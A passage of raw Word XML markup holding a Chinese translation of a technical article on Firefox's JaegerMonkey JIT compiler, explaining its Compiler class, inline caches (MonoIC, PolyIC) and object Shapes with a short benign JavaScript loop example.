      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Compiler类中执行的，该类可在firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>methodjit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Compiler.cpp</w:t>
      </w:r>
      <w:r>
        <w:t>中找到</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。 Compiler类实现了许多操作码处理程序函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>，这些函数使用前面提到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>的AssemblerBuffer和LinkBuffe</w:t>
      </w:r>
      <w:r>
        <w:t>r类将Spi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>derMonkey</w:t>
      </w:r>
      <w:r>
        <w:t>字节码指令转换为它们的本机代码块等效项</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过启用还是禁用内联缓存，并同时支持两个实例，可以进一步细分此类。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>这些</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39B4FD23" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1500" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5FED19" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>翻译功能的目的各不相同。其中一些旨在填充</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PolyIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结构，该结构描述了需要更新或写入内存的嵌入式缓存。其他则用于简单的运算，例如算术运算。这些操作要么调用C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>++存根函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要么使用Nitro编写直接对基元（例如整数和双精度）进行操作的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17B990" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F36AF49" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="452"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">包含一些技巧，可显着提高性能。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> JIT引擎使用称为内联缓存（IC）的技术来执行更快的对象类型查找。与类型为静态并在编译时定义的C / C ++结构不同，JavaScript类型可以在运行时更改。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中间字节</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码支持</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此功能，该中间字节</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码具有</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>特殊指令，例如JSOP_GETPROP，可通过首先查找其类型来返回特定属性的值。所有这些都与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>属性缓存（用于存储现有对象的Shape）一起完成。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中，所有本机对象都具有Shape，Shape是一种定义如何访问对象的结构。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中首次看到类型时，将其视为单态的。存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MonoIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类来处理这些不需要多类型查找但仍需要本机编译的常见情况。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>当对象属性更改类型时，需要更复杂的方法</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF8BE3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D673C8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1248"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引入内联缓存概念的一种简单方法是通过以下JavaScript代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6524A448" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E87B17" w14:textId="77777777" w:rsidR="00483896" w:rsidRPr="001C7552" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="3879"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>“ hello</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[1,2,3]</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/there/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF5C2F" w14:textId="75CF832E" w:rsidR="0026102A" w:rsidRPr="001C7552" w:rsidRDefault="00483896">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="3879"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9" w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D4064D8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRPr="001C7552" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="1360"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>] .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（））</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A699048" w14:textId="77777777" w:rsidR="0026102A" w:rsidRPr="001C7552" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="93"/>
        <w:ind w:left="880"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei" w:eastAsia="Microsoft JhengHei" w:hAnsi="Microsoft JhengHei" w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED0DD83" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="31"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCEF61C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="440"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在上面的代码中，我们遍历一个由Number，String，Array和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RegEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对象组成的小数组。对于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>vals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数组的每个成员，都会调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法。对于数组中的每个对象，解释器必须执行昂贵的类型查找并确定要调用的正确的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法。通过组合内联缓存和针对已知属性访问的存根调用，可以使整个过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>程更加高效。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>修改对</w:t>
      </w:r>
      <w:r>
        <w:t>象的类型后，必须更新本机的get属性（GET_PROP）代码</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mozilla引入了链式PIC（多态串联缓存）插槽来解决此问题。此过程实质上创建了一些本机代码块，它们对已被视为对象的类型执行属性查找。如果第一种类型不匹配，则跳转到下一个代码块以对下一种类型执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查找，依此类推。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计此</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>性能增强功能需要一些</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C44C09" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A5FA7E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安全权衡，我们将在本文的开发原语部分中进行讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A878C1D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D17144A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="955"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JaegerMonkey源代码可以在Firefox源代码的mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
